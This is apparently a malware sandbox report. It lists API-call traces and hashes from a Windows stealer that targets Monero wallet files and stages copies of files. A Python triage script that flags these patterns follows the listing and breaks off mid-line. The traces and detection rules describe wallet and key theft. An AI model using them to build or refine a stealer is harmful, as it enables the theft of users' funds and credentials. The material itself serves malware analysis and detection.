                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 831b1b4233f08f6c673e6f155da272a3d266e28e92b48e16380bf98da507e76c
                            • Instruction ID: 8c6af30cea3d2fa0c77dc691673d53f7c1af11356491d4ae086a42dea87eb9a0
                            • Opcode Fuzzy Hash: 831b1b4233f08f6c673e6f155da272a3d266e28e92b48e16380bf98da507e76c
                            • Instruction Fuzzy Hash: F8116AB1A44209FBD700CB94EC49FBBBBBCFB49B00F108119FA09A7280D7785804CBA1
                            APIs
                            • StrStrA.SHLWAPI(00E4DFC0,?,?,?,0057140C,?,00E4DFC0,00000000), ref: 0057926C
                            • lstrcpyn.KERNEL32(007AAB88,00E4DFC0,00E4DFC0,?,0057140C,?,00E4DFC0), ref: 00579290
                            • lstrlen.KERNEL32(?,?,0057140C,?,00E4DFC0), ref: 005792A7
                            • wsprintfA.USER32 ref: 005792C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: f8f2158be568b8deb450e92e0ebb84d64b791bee98a02b04b5da5fc49064b101
                            • Instruction ID: 80bb70efd7d5ee72a1288718e12c99d0ec9ffd4e80c48668e55c72bc76e5ef20
                            • Opcode Fuzzy Hash: f8f2158be568b8deb450e92e0ebb84d64b791bee98a02b04b5da5fc49064b101
                            • Instruction Fuzzy Hash: 17011EB5500108FFCB04DFECD984EAE7BB9FB89351F108248F9099B201C739AA40DBA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005612B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005612BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005612D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005612F5
                            • RegCloseKey.ADVAPI32(?), ref: 005612FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 0262ed47245e44c9226addd1b96daea1b42fea275a8b51a54257e826d588cc31
                            • Instruction ID: 7c367a44c7a3d818e62dd2ea5628f383c3a1b0d3f940565b12fa0fcff8f051ea
                            • Opcode Fuzzy Hash: 0262ed47245e44c9226addd1b96daea1b42fea275a8b51a54257e826d588cc31
                            • Instruction Fuzzy Hash: C4011DB9A40208BBDB00DFE0DC49FAEB7B8EB88701F00C159FA0597280D7789A01CB55
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00576663
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00576726
                            • ExitProcess.KERNEL32 ref: 00576755
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 5a710cc28a443464432ead690494f5e2472693f74d93d23ed1944431eccf5938
                            • Instruction ID: 37c14931c7c7aea8645551292647dd766a7507228348318bc3dfcaa6ddde0f1e
                            • Opcode Fuzzy Hash: 5a710cc28a443464432ead690494f5e2472693f74d93d23ed1944431eccf5938
                            • Instruction Fuzzy Hash: FC312BB1801219ABDB54EB60EC89BEE7B78BFC4300F408198F31966191DF746A48CF5A
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00580E28,00000000,?), ref: 0057882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00578836
                            • wsprintfA.USER32 ref: 00578850
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: d7fc39a804ff8170a678253403c628089207a362936e7f16d733ee35a9383742
                            • Instruction ID: 962c7ae1db9ed7fdea8b210ed34292a095d15f43ae1cbc92f56a87dea8dae792
                            • Opcode Fuzzy Hash: d7fc39a804ff8170a678253403c628089207a362936e7f16d733ee35a9383742
                            • Instruction Fuzzy Hash: 3221EDB1A40204BBDB44DF94DD49FAEBBB8FB89B11F108519F605A7280C77D9901CBA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0057951E,00000000), ref: 00578D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00578D62
                            • wsprintfW.USER32 ref: 00578D78
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: 6cc011f60438f7e4f16d7a39d17493ede09ca923636cf2bcfaabeda333c425a0
                            • Instruction ID: bc65c4489cc8b36cec50863d2fb38bd5e38e86f6c7bcbc8a1929c74c93c93aca
                            • Opcode Fuzzy Hash: 6cc011f60438f7e4f16d7a39d17493ede09ca923636cf2bcfaabeda333c425a0
                            • Instruction Fuzzy Hash: 6DE08CB1A40208BFCB00DF94DC0AE697BB8EB85702F008094FD0997280DA799E00CB9A
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 00578B60: GetSystemTime.KERNEL32(00580E1A,00E4A930,005805AE,?,?,005613F9,?,0000001A,00580E1A,00000000,?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 00578B86
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0056A2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 0056A3FF
                            • lstrlen.KERNEL32(00000000), ref: 0056A6BC
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 0056A743
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 0ada49e7452becd84e7fd3b6504740eee251ee38c93e6e3c221921daf8d692a3
                            • Instruction ID: e71ea159807e1517f58bfef6152ecb32d85b371629c21e61c64d0171412b760a
                            • Opcode Fuzzy Hash: 0ada49e7452becd84e7fd3b6504740eee251ee38c93e6e3c221921daf8d692a3
                            • Instruction Fuzzy Hash: DAE100728101099ACB05FBA4EC9AEEE7738BFD4300F50C169F51B72091EF346A49DB66
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 00578B60: GetSystemTime.KERNEL32(00580E1A,00E4A930,005805AE,?,?,005613F9,?,0000001A,00580E1A,00000000,?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 00578B86
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0056D481
                            • lstrlen.KERNEL32(00000000), ref: 0056D698
                            • lstrlen.KERNEL32(00000000), ref: 0056D6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 0056D72B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 834615cba2eeed77338aa616fc0e983891f398f6e10fb8efbad2507fa4f75330
                            • Instruction ID: dc60e2670c97d6ffde14bc267ba78ab1c3914bbd5b56c8f55b262e0983c8e80a
                            • Opcode Fuzzy Hash: 834615cba2eeed77338aa616fc0e983891f398f6e10fb8efbad2507fa4f75330
                            • Instruction Fuzzy Hash: EE91F1729101059ACB04FBA4EC9ADEE7B38BFD4300F50C168F51B66091EF346A09DB66
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 00578B60: GetSystemTime.KERNEL32(00580E1A,00E4A930,005805AE,?,?,005613F9,?,0000001A,00580E1A,00000000,?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 00578B86
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0056D801
                            • lstrlen.KERNEL32(00000000), ref: 0056D99F
                            • lstrlen.KERNEL32(00000000), ref: 0056D9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 0056DA32
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 494f253a676379e1f7834b80055911af666902b77ac1164cb52dee099144a267
                            • Instruction ID: 7de9e13a0d2701595defd1222fe7387646b6bd4aada461734d7a7a51ae2e59db
                            • Opcode Fuzzy Hash: 494f253a676379e1f7834b80055911af666902b77ac1164cb52dee099144a267
                            • Instruction Fuzzy Hash: F481E0729101159BCB04FBB4EC5ADEE7B38BFD4300F508529F51AA6091EF346A09DB67
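The three function blocks above share one shape: a file is copied (CopyFileA), measured (lstrlen), and then removed (DeleteFileA), with the \Monero\wallet.keys path reaching them through subcall 0057A9B0; the blocks before them build strings on the process heap (GetProcessHeap, RtlAllocateHeap, wsprintfA/W with "%dx%d" and "%hs"). As an added triage aid, not part of the Joe Sandbox report or of the Stealc sample, the Python below parses this listing format into per-function API sequences, keeps the calls inherited from "Part of subcall function" lines, and flags those patterns plus the StrStrA("encrypted_key") / CryptStringToBinaryA(CRYPT_STRING_BASE64) pairing that appears later in this listing. The rule names are the example's own; the input is an abridged copy of lines from this page.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: abridged copies of API lines from the listing above,
# three function blocks in the exact layout the sandbox report uses.
SAMPLE_LISTING = r"""
APIs
  • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0056A2E1
• lstrlen.KERNEL32(00000000,00000000), ref: 0056A3FF
• DeleteFileA.KERNEL32(00000000), ref: 0056A743
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,00580E28,00000000,?), ref: 0057882F
• RtlAllocateHeap.NTDLL(00000000), ref: 00578836
• wsprintfA.USER32 ref: 00578850
APIs
• StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00569D39
  • Part of subcall function 00569AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569AEF
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, Api.MODULE,
# optional "(args)", then ", ref: XXXXXXXX" (wsprintf lines carry no parentheses).
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$"
)
CRYPT_STRING_BASE64 = 0x1   # dwFlags value passed to CryptStringToBinaryA in the listing

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                  # call-site address
    subcall: Optional[str]    # callee address when the call is inherited from a subcall

@dataclass
class FunctionTrace:
    calls: List[ApiCall] = field(default_factory=list)

    def direct(self) -> List[ApiCall]:
        """Calls made by the function itself, in address order."""
        return sorted((c for c in self.calls if c.subcall is None), key=lambda c: c.ref)

    def has(self, prefix: str) -> bool:
        return any(c.api.startswith(prefix) for c in self.calls)

def _hex(arg: str) -> Optional[int]:
    return int(arg, 16) if re.fullmatch(r"[0-9A-F]{8}", arg) else None

def parse_listing(text: str) -> List[FunctionTrace]:
    traces: List[FunctionTrace] = []
    current: Optional[FunctionTrace] = None
    for line in text.splitlines():
        if line.strip() == "APIs":            # every function block starts here
            current = FunctionTrace()
            traces.append(current)
            continue
        m = API_LINE.match(line)
        if m is None or current is None:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        current.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return traces

def flag_trace(trace: FunctionTrace) -> set:
    flags = set()
    direct = trace.direct()
    copies = [c.ref for c in direct if c.api.startswith("CopyFile")]
    deletes = [c.ref for c in direct if c.api.startswith("DeleteFile")]
    # Copy, then delete, inside one function: staging plus cleanup. Address order is
    # only a proxy for execution order; confirm it in the disassembly before relying on it.
    if copies and deletes and min(copies) < max(deletes):
        flags.add("FILE_STAGING")
    if any("wallet" in a.lower() for c in trace.calls for a in c.args):
        flags.add("WALLET_PATH")
    if trace.has("GetProcessHeap") and trace.has("RtlAllocateHeap") and trace.has("wsprintf"):
        flags.add("HEAP_SPRINTF")
    wants_key = any(c.api == "StrStrA" and any("encrypted_key" in a for a in c.args) for c in trace.calls)
    b64 = any(c.api.startswith("CryptStringToBinary") and len(c.args) > 2
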